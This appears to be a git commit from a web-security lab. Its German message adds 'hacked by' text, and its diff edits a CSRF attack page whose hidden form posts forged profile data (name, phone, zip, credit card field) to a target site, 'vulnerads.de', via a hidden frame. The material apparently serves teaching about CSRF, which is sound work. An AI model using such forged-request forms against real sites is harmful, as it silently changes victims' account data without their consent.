gehackt von ergänzt

--- a/webapps/surfer/index.html
+++ b/webapps/surfer/index.html
@@ -8,7 +8,7 @@
 	<form id="profile" method='POST' accept-charset="utf-8" action='https://vulnerads.de/profile' target="csrf-frame">
         <input type="hidden" id="username" name="username" placeholder="Benutzername" class="form-control" value="g" />
         <input type="hidden" id="firstname" name="firstname" placeholder="Vorname" class="form-control" value="Gustav" />
-        <input type="hidden" id="lastname" name="lastname" placeholder="Nachname" class="form-control" value="Gans" />
+        <input type="hidden" id="lastname" name="lastname" placeholder="Nachname" class="form-control" value="Gans, gehackt von Surfer's Paradise" />
         <input type="hidden" id="creditcardnumber" name="creditcardnumber" placeholder="Kreditkartennummer" class="form-control" value="" />
         <input type="hidden" id="phonenumber" name="phonenumber" placeholder="Telefonnummer" class="form-control" value="+49 (451) 20955152" />
         <input type="hidden" id="zip" name="zip" placeholder="PLZ" class="form-control" value="23568" />
